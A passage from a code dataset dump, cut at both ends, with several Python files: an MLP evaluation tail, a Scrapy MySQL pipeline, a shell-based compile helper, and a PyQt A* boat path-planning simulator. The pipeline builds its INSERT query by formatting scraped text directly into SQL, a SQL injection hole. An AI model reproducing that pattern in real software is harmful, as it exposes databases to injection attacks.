print(best_mlp.w)\n # print()\n print('Best n:')\n print(best_n)\n print('Confusion Matrix:')\n print(conf_m)\n print('Test Precision:')\n print(best_precision)\n actual_precision = precision_score(y_validation.values.astype(int), p_y.values.astype(int), average='micro')\n print('Validation Precision:')\n print(actual_precision)\n","sub_path":"Python_Assignments/mlp/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"231201750","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\nimport logging\nfrom settings import *\n\n\n\nclass QiushiPipeline(object):\n\n def __init__(self):\n try:\n self.dbpool = adbapi.ConnectionPool(\n 'MySQLdb',\n db = MYSQL_DBNAME,\n user = MYSQL_USER,\n passwd = MYSQL_PASSWD,\n cursorclass = MySQLdb.cursors.DictCursor,\n charset = 'utf8',\n use_unicode = True,\n )\n\n except Exception as e:\n logging.exception(e)\n\n\n\n def process_item(self, item, spider):\n content = item['content']\n comment_count = item['comment_count']\n vote_count = item['vote_count']\n url = item['url']\n spider_time = item['spider_time']\n channel = item['channel']\n\n try:\n self.dbpool.runQuery(\"insert into blog_qiushibaike values(NULL,'{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(content[0].encode('utf-8'),\n comment_count[0].encode('utf-8'),\n vote_count[0].encode('utf-8'),\n url.encode('utf-8'),\n spider_time.encode('utf-8'),\n channel.encode('utf-8'),\n ))\n except Exception as e:\n logging.exception(e)\n\n return item\n","sub_path":"spiders/qiushi/qiushi/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415934002","text":"#!/usr/bin/env python\n\n'''\n\n- This script goes in the PMOD folder\n\nThis script faciliates compiling binaries from source files \nwithin the source folder ('src'), this is accomplished by \nformatting and running a shell script.\nand moving those binaries to the binaries folder ('bin').\n\nA graphical example is shown below: this script is run within 'Main'\n\n |-- 'bin'----|---'run.sh'\n'Main' --| |\n |-- 'src'-| |---'' <----------<------|\n | |\n |--'bin-2' <--------|-->| |\n | | |--| The script moves the binaries 'bin-1' and 'bin-2'\n |--'bin-1' <--------|-->| into the 'bin' folder from the 'src' folder\n | |\n |--'compile.sh' -->--| 'compile.sh' creates 'aux' and 'xeb_server'\n\n\nInfo:\n\n - Change 'linux' to 'windows' for the OS_INST variable if running on windows\n\n\nInputs:\n\n bin_list : [string or array of strings], The strings corrospond to the names of the binary files\n\n src_script : [string] corrosponds to the name of the script which\n generates the binaries named in 'bin_list\n\n bin_script : [string] corrosponds to the name of the script which\n runs the binary files within the binary directory\n\n DIR_NAME : [string] (\"Main\"), corrosponds to the name of the program folder\n\n OS_INST : [string] (\"linux\"), The OS on which the program is ran\n\n SRC_DIR : [string] (\"src\"), The name of the source folder\n\n BIN_DIR : [string] (\"bin\"), The name of the binary directory\n\n SPC : [string] (\" \"), Indention spaces for more legable printing\n\n\nOutput:\n\n Boolean: \"True\" if success, else \"False\" if failure.\n\n'''\n\nimport sys\nimport os\nimport subprocess\nimport time\n\nimport pmod.cmdline as cml\nimport pmod.cmdutil as cmu\nimport pmod.ioparse as iop\nimport pmod.strlist as strl\n\n\n\ndef compileFunc(bin_list,\n src_script = \"compile.sh\",\n bin_script = \"run.sh\",\n DIR_NAME = \"Main\",\n OS_INST = \"linux\",\n SRC_DIR = \"src\",\n BIN_DIR = \"bin\",\n SPC=\" \"):\n\n # Setting the stage\n\n # Pathway variables, these should always be strings\n DIRPATH = \"\"\n SRCPATH = \"\"\n BINPATH = \"\"\n\n # Check input variable 'bin_list' for TypeError\n if(isinstance(bin_list,(list,tuple))):\n if(not all([isinstance(entry,str) for entry in bin_list])):\n print(SPC+\"[compileFunc] ExitError: if input 'bin_list' is an array, it must contain only strings\\n\")\n return False\n elif(isinstance(bin_list,str)):\n bin_list = [bin_list]\n else:\n print(SPC+\"[compileFunc] ExitError: input 'bin_list' must be either an array or a string\\n\")\n return False\n\n # Set-up debug variables\n movexeb = False # Delete\n moveaux = False # Delete\n move_dict = {}\n for entry in bin_list:\n move_dict[entry] = False\n exefail = False\n\n #------------------\n # Compile actions |\n #------------------\n\n print(\" \")\n print(\"The 'compileFunc' routine is now starting...runtime messesges will be printed below:\\n\")\n\n # Set internal command line and command line utility\n try:\n cmv = cml.PathParse(OS_INST)\n cmt = cmu.cmdUtil(cmv)\n if(cmt.CML_INIT == False):\n print(SPC+\"Error: 'cmdUtil' could not be initialized\\n\")\n return False\n print(SPC+\"Success: Internal pathway routine has been successfully initialized\")\n except:\n print(SPC+\"Error: an error occured while initializing internal pathway routine\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Set start pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the '\"+DIR_NAME+\"' folder pathway could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n DIRPATH = value\n\n # Moving into the binary folder (bin)\n success, value = cmv.cmd(\"cd \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the binary folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Set binary directory (bin) pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', pathway could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\")\n return False\n else:\n BINPATH = value\n\n # Get list of content of Bin directory\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', content could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n binarylist = value\n\n # Check for pre-existing binary files and remove any if the exist\n for entry in bin_list:\n if(entry in binarylist):\n print(SPC+\"Warning: An already existing '\"+entry+\"' file is present in the binary folder\")\n print(SPC+\" An attempt will be made to overwrite this file...\")\n success, value = cmv.cmd(\"rm \"+entry)\n if(not success):\n print(SPC+\"Error: failure to delete existing file, '\"+entry+\"'\")\n print(SPC+\"The newly compiled version of this binary may end up in the '\"+DIR_NAME+\"' folder\\n\")\n\n # Return to 'Main' directory\n success, value = cmv.cmd(\"cd ..\")\n if(not success):\n print(SPC+\"Error: It looks like the program folder, '\"+DIR_NAME+\"', could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Moving into the source folder (src)\n cmv = cml.PathParse(OS_INST)\n success, value = cmv.cmd(\"cd \"+SRC_DIR) \n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the source folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get source folder (src) pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', pathway could not be accessed\")\n print(SPC+\" Check to see if the source folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n SRCPATH = value\n\n # Get content of source folder (src)\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed\")\n print(SPC+\" Check to see if the source file properly formatted\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n if(isinstance(value,(list,tuple))):\n if(len(value) > 0):\n check_list = [i.rstrip() for i in value]\n\n # Check for pre-existing binary files in the source folder (src) and remove any that are found\n for entry in bin_list:\n if(entry in check_list):\n print(SPC+\"Warning: An already existing '\"+entry+\"' file is present in the binary folder\")\n print(SPC+\" An attempt will be made to overwrite this file...\")\n success, value = cmv.cmd(\"rm \"+entry)\n if(not success):\n print(SPC+\"Error: failure to delete existing file, '\"+entry+\"'\")\n print(SPC+\"There may be a failure when attempting to overwrite this binary during compilation\\n\")\n else:\n print(\"Error: It looks like the source folder, '\"+SRC_DIR+\"', is empty\") \n print(\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed\")\n print(SPC+\" Check to ensure that the source directory is properly formatted\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n \n # Move system directory to source folder (src)\n try:\n os.chdir(SRCPATH)\n except:\n print(SPC+\"Error: failure to set the shell pathway to the source folder\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False \n\n # Ensure that the compiling shell script has UNIX endline characters\n success = cmt.convert_file_endline(src_script, foldName = SRC_DIR)\n if(success == False):\n print(SPC+\"Warning: '\"+src_script+\"'shell script not formatted, errors may result from improper formatting\\n\")\n\n # Change the mode on the shell script to an exceutable\n try:\n subprocess.call(\"chmod +x \"+src_script,shell=True)\n except:\n print(SPC+\"Error: failure to set the 'compileFunc' shell script to an executable\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Run the compiling shell script\n try:\n subprocess.call(\"./\"+src_script,shell=True)\n except:\n print(SPC+\"Error: failure to run the 'compileFunc' shell script\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get content of source folder (src) after running compiling script\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed after compiling\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # check contents of source folder (src) for binary(ies)\n if(isinstance(value,(list,tuple))):\n if(len(value) > 0):\n for entry in bin_list:\n if(entry in value):\n print(SPC+\"Success: The binary file, '\"+entry+\"', has been found after compiling\")\n move_dict[entry] = True\n else:\n print(SPC+\"Error: it looks like the binary file, '\"+entry+\"' wasn't created upon compilation\")\n else:\n print(\"Error: It looks like the source folder, '\"+SRC_DIR+\"', is empty\")\n print(\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed after compiling\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move binaries to the main directory\n for entry in bin_list:\n if(move_dict[entry]):\n success, value = cmv.cmd(\"mv \"+entry+\" ..\")\n if(not success):\n print(SPC+\"Error: '\"+entry+\"' was not successfully moved into the '\"+DIR_NAME+\"' directory\")\n move_dict[entry] = False\n\n # Move pathway back to the main directory\n success, value = cmv.cmd(\"cd ..\")\n if(not success):\n print(SPC+\"Error: It looks like the program folder, '\"+DIR_NAME+\"', could not be reaccessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move binaries into the binary directory\n for entry in bin_list:\n if(move_dict[entry]):\n success, value = cmv.cmd(\"mv \"+entry+\" \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: '\"+entry+\"' was not successfully moved into the '\"+BIN_DIR+\"' directory\")\n move_dict[entry] = False\n\n # Move pathway back into the binary directory\n success, value = cmv.cmd(\"cd \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the binary folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move system directory to binary directory (bin)\n try:\n os.chdir(BINPATH)\n except:\n print(SPC+\"Error: failure to set the shell pathway to the binary folder\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Ensure that the running shell script has UNIX endline characters\n success = cmt.convert_file_endline(bin_script, foldName=BIN_DIR)\n if(success == False):\n print(SPC+\"Warning: \"+bin_script+\" shell script not formatted, errors may result from improper formatting\\n\")\n\n # Change the mode on the shell script to an exceutable\n try:\n subprocess.call(\"chmod +x \"+bin_script,shell=True)\n except:\n print(SPC+\"Error: failure to set the '\"+bin_script+\"' shell script to an executable\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get content of binary folder (bin) after moving binaries\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', content could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\")\n return False\n\n # Move binaries into the binary directory\n bin_fail = False\n for entry in bin_list:\n if(entry in value):\n print(SPC+\"Success: The '\"+entry+\"' binary is accounted for in the binary folder\")\n elif(move_dict[entry] == False):\n print(SPC+\"Error: The '\"+entry+\"' binary is not accounted for in the binary folder\")\n bin_fail = True\n else:\n bin_fail = True\n\n if(bin_fail):\n print(SPC+\"Error: compileFunc failed, binary(ies) missing; program will not work as intended\\n\")\n\n return True\n\n\n#----------\n# example |\n#----------\n\n# Main program: test example, change \"False\" to \"True\" to actually run\n\n#---------------------------------------------------------------------|\n\n#bin_list = (\"xeb_server\",\"aux\")\n#src_script = \"compile.sh\"\n#bin_script = \"run.sh\"\n#\n#if(False):\n# success = compileFunc(bin_list, src_script = src_script, bin_script = bin_script)\n#else:\n# success = True\n#\n#print(\" \")\n#if(success):\n# print(\"No fatal errors detected, see above for runtime messesges\")\n#else:\n# print(\"Fatal error detected! See above for runtime errors\")\n#print(\" \")\n","sub_path":"program_scaffolding/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":14910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584494726","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport math\r\nimport sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QDialog, QGraphicsScene, QStatusBar\r\nfrom PyQt5.QtGui import QPen, QBrush\r\nfrom PyQt5.Qt import QTimer\r\nfrom PyQt5.QtCore import Qt, QLineF\r\nfrom PyQt5.QtTest import QTest\r\n\r\nfrom A_star_Simulation_Window import UI_Simulator\r\n\r\n\"\"\"\r\n수정해야 할 것 :\r\n1) 특정 조건에서 Stuck 되는 것 : 알고리즘 문제인지, gain 값 문제인지 확인! -> Stuck 되었을 때 처리하는 코드 추가\r\n-> h = 0으로 했을 때 stuck은 안되지만 목적지 쪽으로 못감(당연하겠지...)\r\n# 2) Simulator에 Gain 값 조정할 수 있게 설정, 현위치 등 Board 표시하기\r\n# 3) 초깃값 여러군데 통일\r\n4) Reset, Pause 기능 잘 안 되는 것\r\n5) 초기 heading이 잘 들어가는지 확인\r\n6) obstacle, 시작점, 도착점도 마우스로 찍어서 설정할 수 있게 하는 기능\r\n7) heading을 변경했을 때 normalize해야 함\r\n8) 넘파이 배열을 스마트하게 쓸 수 있는 방법 이용\r\n9) 헤딩 회전에서 각도가 마이너스로 잘 들어가는지, 180도 이상인 둔각에서는 잘 되는지 필시 확인!\r\n# 10) 휴리스틱에도 gain 값 곱해주는 것 고려\r\n11) lineout 함수에서 오른쪽 벡터와 선이 아예 일치할 경우 등 예외처리 꼭 보기!\r\n12) 헤딩 방향으로 장애물 자동 할당 기능\r\n13) 닫기 버튼 누르면 프로세스 종료되게\r\n14) trajectory 그릴 때 마지막 점까지 그릴 수 있도록(?)\r\n15) 시뮬레이터 배 모양으로 바꾸기\r\n16) 시뮬레이터 헤딩 표시하기\r\n17) Status Bar에 마우스 위치 표시\r\n18) 5/10단위로 그래픽뷰에 격자 그리기\r\n# 19) start 버튼 전에 그리드 그려지도록 함수 추가\r\n20) search 포인트, 그 주변 f 계산중인 8방위 표시\r\n# 21) 도착지는 X나 네모로 다르게 표시, Range 표시\r\n22) board 좌표 표시할 때는 자릿수 맞추도록 format\r\n\"\"\"\r\n\r\n\r\nclass Obstacle:\r\n def __init__(self):\r\n self.ob_list = np.array([[1, 2], [2, 2], [3, 2], [4, 2], [5, 2], [6, 2], [7, 2], [8, 2], [9, 2], [10, 2],\r\n [11, 2], [12, 2], [13, 2], [14, 2], [15, 2], [16, 2], [17, 2], [18, 2], [19, 2], [20, 2],\r\n [21, 6], [22, 6], [23, 6], [24, 6], [25, 6], [26, 6], [27, 6], [28, 6], [29, 6],\r\n [17, 10], [18, 10], [19, 10], [17, 11], [18, 11], [19, 11],\r\n [24, 18], [24, 19], [24, 20], [24, 21], [24, 22], [24, 23]])\r\n\r\n\r\nclass PathPlanner:\r\n def __init__(self):\r\n self.edge_points = np.array([[0, 0], [30, 0], [30, 30], [0, 30]])\r\n\r\n self.obstacle = Obstacle()\r\n self.ob_list = self.obstacle.ob_list\r\n\r\n self.start_pos = np.array([1, 1])\r\n self.start_heading = np.array([1, 0])\r\n self.cur_pos = self.start_pos #[x, y] 현재 배가 있는 위치\r\n self.cur_heading = np.array([1, 0]) #[x, y] 벡터!, normalize 수시로 필요!\r\n self.end_pos = [20, 20]\r\n\r\n self.obstacle_search_range = 1\r\n self.predict_step = 5\r\n self.predict_step_size = 1\r\n\r\n self.g_value_rotate_gain_45 = 1\r\n self.g_value_rotate_gain_90 = 1.5\r\n self.g_value_rotate_gain_180 = 2\r\n self.h_value_gain = 0.7\r\n\r\n self.move_size = 1\r\n\r\n self.past_path = np.array([self.start_pos])\r\n self.trajectory = np.zeros((1, 2)) # [x, y]\r\n\r\n self.arrival_range = 1\r\n\r\n self.make_trajectory()\r\n\r\n def is_finished(self):\r\n if math.sqrt((self.cur_pos[0]-self.end_pos[0])**2 + (self.cur_pos[1]-self.end_pos[1])**2) <= self.arrival_range:\r\n return True\r\n else:\r\n return False\r\n\r\n def make_trajectory(self):\r\n search_center = np.array([self.cur_pos])\r\n predict_heading = self.cur_heading\r\n\r\n search_center, predict_heading = self.best_point(search_center, predict_heading)\r\n\r\n self.trajectory = search_center #초기화\r\n\r\n for i in range(self.predict_step - 1):\r\n search_center, predict_heading = self.best_point(search_center, predict_heading)\r\n self.trajectory = np.append(self.trajectory, search_center, axis=0)\r\n\r\n def best_point(self, search_center, predict_heading):\r\n min_f_value = 10000000\r\n best_point = np.zeros((0, 2))\r\n best_heading = np.zeros((0, 2))\r\n points = self.predict_step_size * np.array(\r\n [[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]])\r\n for i in range(8): #더 좋은 방법 있나 찾기\r\n points[i][0] += search_center[0][0]\r\n points[i][1] += search_center[0][1]\r\n\r\n for p in points:\r\n if self.is_line_out(p):\r\n continue\r\n if self.is_obstacle_in(p):\r\n continue\r\n\r\n # g값 중 시작부터 거리를 계산함\r\n distance_to_cur = (p[0] - self.cur_pos[0]) ** 2 + (p[1] - self.cur_pos[1]) ** 2\r\n\r\n # g값 중 회전 가중치를 계산함\r\n vec = p - search_center[0]\r\n vec = vec / math.sqrt((vec[0] ** 2 + vec[1] ** 2))\r\n sin_theta = round(predict_heading[0] * vec[1] - predict_heading[1] * vec[0], 5)\r\n theta = math.asin(sin_theta) * 180 / math.pi # degree 값\r\n\r\n distance_to_search = (p[0] - search_center[0][0]) ** 2 + (p[1] - search_center[0][1]) ** 2\r\n if 45 >= abs(theta):\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_45\r\n elif 90 >= abs(theta):\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_90\r\n else:\r\n rotate_cost = distance_to_search * self.g_value_rotate_gain_180\r\n\r\n # g값 합침\r\n g = distance_to_cur + rotate_cost\r\n\r\n # h값을 계산함\r\n h = ((p[0] - self.end_pos[0]) ** 2 + (p[1] - self.end_pos[1]) ** 2) * self.h_value_gain\r\n\r\n # f값 총합\r\n f = g + h\r\n\r\n # 최소 f 값 찾기\r\n if min_f_value > f:\r\n min_f_value = f\r\n best_point = np.array([p])\r\n best_heading = vec\r\n\r\n return best_point, best_heading\r\n\r\n def is_line_out(self, point):\r\n crossed = 0\r\n for i in range(len(self.edge_points)):\r\n j = (i + 1) % len(self.edge_points)\r\n if (self.edge_points[i][1] > point[1]) != (self.edge_points[j][1] > point[1]):\r\n intersection = float((self.edge_points[j][0] - self.edge_points[i][0]) * (\r\n point[1] - self.edge_points[i][1]) / (\r\n self.edge_points[j][1] - self.edge_points[i][1]) +\r\n self.edge_points[i][0])\r\n if point[0] < intersection:\r\n crossed = crossed + 1\r\n return (crossed % 2) == 0 #밖에 있으면 true\r\n\r\n def is_obstacle_in(self, point):\r\n for i in range(len(self.ob_list)):\r\n distance_to_ob = math.sqrt((point[0] - self.ob_list[i][0]) ** 2 + (point[1] - self.ob_list[i][1]) ** 2)\r\n if distance_to_ob < self.obstacle_search_range:\r\n return True\r\n return False\r\n\r\n def move_boat(self):\r\n print(\"cur_pos : \", end='')\r\n print(self.cur_pos)\r\n \r\n vec = self.trajectory[0] - self.cur_pos\r\n vec = vec / math.sqrt((vec[0]**2 + vec[1]**2))\r\n next = vec * self.move_size\r\n \r\n self.cur_pos = self.cur_pos + next\r\n self.cur_heading = vec\r\n self.past_path = np.append(self.past_path, np.array([self.cur_pos]), axis=0)\r\n\r\n def obstacle_update(self): #lidar로 받아올 때 혹은 장애물 실시간 할당 시\r\n self.ob_list = self.obstacle.ob_list\r\n\r\n\r\nclass MainController:\r\n def __init__(self):\r\n self.path_planner = PathPlanner()\r\n # window.draw_grid(self.path_planner.edge_points, self.path_planner.start_pos, self.path_planner.ob_list, self.path_planner.end_pos)\r\n\r\n def board_show(self):\r\n cur_pos_str = \"( \" + str(round(self.path_planner.cur_pos[0], 2)) + \" , \" + str(round(self.path_planner.cur_pos[1], 2)) + \" )\"\r\n window.ui.cur_pos_lineEdit.setText(cur_pos_str)\r\n\r\n cur_heading_str = \"( \" + str(round(self.path_planner.cur_heading[0], 2)) + \" , \" + str(round(self.path_planner.cur_heading[1], 2)) + \" )\"\r\n window.ui.cur_heading_lineEdit.setText(cur_heading_str)\r\n\r\n def run_to_goal(self):\r\n while not self.path_planner.is_finished():\r\n self.path_planner.make_trajectory()\r\n self.path_planner.move_boat()\r\n self.board_show()\r\n window.draw(self.path_planner.edge_points, self.path_planner.cur_pos, self.path_planner.trajectory,\r\n self.path_planner.start_pos, self.path_planner.past_path, self.path_planner.ob_list,\r\n self.path_planner.end_pos, self.path_planner.arrival_range)\r\n QTest.qWait(100)\r\n print(\"----- MainController/run_to_goal/finished\")\r\n window.timer.stop()\r\n\r\n\r\nclass SimulationWindow(QDialog):\r\n controller = MainController()\r\n timer = QTimer()\r\n\r\n def __init__(self, parent=None):\r\n super(SimulationWindow, self).__init__(parent)\r\n self.ui = UI_Simulator()\r\n self.ui.set_UI(self)\r\n\r\n self.draw_grid(self.controller.path_planner.edge_points, self.controller.path_planner.start_pos,\r\n self.controller.path_planner.ob_list, self.controller.path_planner.end_pos,\r\n self.controller.path_planner.arrival_range)\r\n\r\n ##Simulator Initial Values\r\n self.ui.start_point_x_spinBox.setValue(1)\r\n self.ui.start_point_y_spinBox.setValue(1)\r\n self.ui.start_heading_x_spinBox.setValue(1)\r\n self.ui.start_heading_y_spinBox.setValue(0)\r\n self.ui.end_point_x_spinBox.setValue(20)\r\n self.ui.end_point_y_spinBox.setValue(20)\r\n self.ui.ob_search_range_doubleSpinBox.setValue(1)\r\n self.ui.predict_step_spinBox.setValue(5)\r\n self.ui.predict_step_size_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_45_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_90_doubleSpinBox.setValue(1.5)\r\n self.ui.g_value_rotate_gain_180_doubleSpinBox.setValue(2)\r\n self.ui.h_value_gain_doubleSpinBox.setValue(0.7)\r\n self.ui.move_size_doubleSpinBox.setValue(1)\r\n self.ui.arrival_range_doubleSpinBox.setValue(1)\r\n\r\n def do_calc(self):\r\n self.controller.path_planner.start_pos = np.array([self.ui.start_point_x_spinBox.value(), self.ui.start_point_y_spinBox.value()]) #잘 들어가나?\r\n self.controller.path_planner.cur_pos = self.controller.path_planner.start_pos\r\n self.controller.path_planner.cur_heading = np.array(\r\n [self.ui.start_heading_x_spinBox.value(), self.ui.start_heading_y_spinBox.value()])\r\n self.trajectory = np.zeros((1, 2))\r\n self.controller.path_planner.past_path = np.array([self.controller.path_planner.start_pos])\r\n self.controller.path_planner.end_pos = np.array(\r\n [self.ui.end_point_x_spinBox.value(), self.ui.end_point_y_spinBox.value()])\r\n self.controller.path_planner.predict_step = self.ui.predict_step_spinBox.value()\r\n self.controller.path_planner.predict_step_size = self.ui.predict_step_size_doubleSpinBox.value()\r\n self.controller.path_planner.obstacle_search_range = self.ui.ob_search_range_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_45 = self.ui.g_value_rotate_gain_45_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_90 = self.ui.g_value_rotate_gain_90_doubleSpinBox.value()\r\n self.controller.path_planner.g_value_rotate_gain_180 = self.ui.g_value_rotate_gain_180_doubleSpinBox.value()\r\n self.controller.path_planner.h_value_gain = self.ui.h_value_gain_doubleSpinBox.value()\r\n self.controller.path_planner.move_size = self.ui.move_size_doubleSpinBox.value()\r\n self.controller.path_planner.arrival_range = self.ui.arrival_range_doubleSpinBox.value()\r\n\r\n self.controller.run_to_goal()\r\n\r\n def start(self):\r\n self.ui.status_lineEdit.setText(\"Start\")\r\n self.timer.start(50)\r\n self.timer.timeout.connect(self.do_calc)\r\n\r\n def pause(self):\r\n self.ui.status_lineEdit.setText(\"Pause\")\r\n self.timer.stop()\r\n\r\n def reset(self):\r\n self.ui.status_lineEdit.setText(\"Reset\")\r\n #self.controller 값을 수정해줘야 할까?\r\n self.ui.start_point_x_spinBox.setValue(1)\r\n self.ui.start_point_y_spinBox.setValue(1)\r\n self.ui.start_heading_x_spinBox.setValue(1)\r\n self.ui.start_heading_y_spinBox.setValue(0)\r\n self.ui.end_point_x_spinBox.setValue(20)\r\n self.ui.end_point_y_spinBox.setValue(20)\r\n self.ui.ob_search_range_doubleSpinBox.setValue(1)\r\n self.ui.predict_step_spinBox.setValue(5)\r\n self.ui.predict_step_size_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_45_doubleSpinBox.setValue(1)\r\n self.ui.g_value_rotate_gain_90_doubleSpinBox.setValue(1.5)\r\n self.ui.g_value_rotate_gain_180_doubleSpinBox.setValue(2)\r\n self.ui.h_value_gain_doubleSpinBox.setValue(0.7)\r\n self.ui.move_size_doubleSpinBox.setValue(1)\r\n self.ui.arrival_range_doubleSpinBox.setValue(1)\r\n\r\n def draw_grid(self, edge_points, start_pos, obstacles, end_pos, arrival_range):\r\n scale = 0.05 # 1pixel = 0.05m // 작을수록 맵 범위를 벗어남\r\n c = 1 / scale\r\n\r\n self.scene = GraphicsScene()\r\n self.ui.graphicsView.setScene(self.scene)\r\n\r\n ## 경계선 그리기\r\n pen_edges = QPen(Qt.black, 2)\r\n for i in range(len(edge_points)):\r\n j = (i + 1) % len(edge_points)\r\n self.scene.addLine(QLineF(c * edge_points[i][0], -c * edge_points[i][1],\r\n c * edge_points[j][0], -c * edge_points[j][1]), pen_edges)\r\n\r\n ## 장애물 그리기\r\n pen_obstacle = QPen(Qt.black)\r\n for i in range(len(obstacles)):\r\n obstacle_diameter = c * 0.4\r\n self.scene.addEllipse(c * obstacles[i][0] - obstacle_diameter / 2,\r\n -c * obstacles[i][1] - obstacle_diameter / 2,\r\n obstacle_diameter, obstacle_diameter, pen_obstacle, QBrush(Qt.black))\r\n\r\n ## 배 그리기\r\n pen_boat = QPen(Qt.green)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n diameter, diameter, pen_boat, QBrush(Qt.green))\r\n\r\n # ## 출발지점 그리기\r\n # pen_start = QPen(Qt.red)\r\n # diameter = c * 0.4\r\n # self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n # diameter, diameter, pen_start, QBrush(Qt.red))\r\n\r\n ## 목적지 그리기\r\n pen_arrival_range = QPen(Qt.blue, 0.8)\r\n diameter = c * arrival_range\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_arrival_range, QBrush(Qt.white))\r\n pen_end = QPen(Qt.blue)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_end, QBrush(Qt.blue))\r\n\r\n def draw(self, edge_points, cur_pos, trajectory, start_pos, past_path, obstacles, end_pos, arrival_range):\r\n scale = 0.05 # 1pixel = 0.05m // 작을수록 맵 범위를 벗어남\r\n c = 1/scale\r\n\r\n self.scene = GraphicsScene()\r\n self.ui.graphicsView.setScene(self.scene)\r\n\r\n ## 경계선 그리기\r\n pen_edges = QPen(Qt.black, 2)\r\n for i in range(len(edge_points)):\r\n j = (i+1) % len(edge_points)\r\n self.scene.addLine(QLineF(c * edge_points[i][0], -c * edge_points[i][1],\r\n c * edge_points[j][0], -c * edge_points[j][1]), pen_edges)\r\n\r\n ## 예측 경로 그리기\r\n pen_trajectory = QPen(Qt.red)\r\n for i in range(len(trajectory)-1):\r\n self.scene.addLine(QLineF(c * trajectory[i][0], -c * trajectory[i][1],\r\n c * 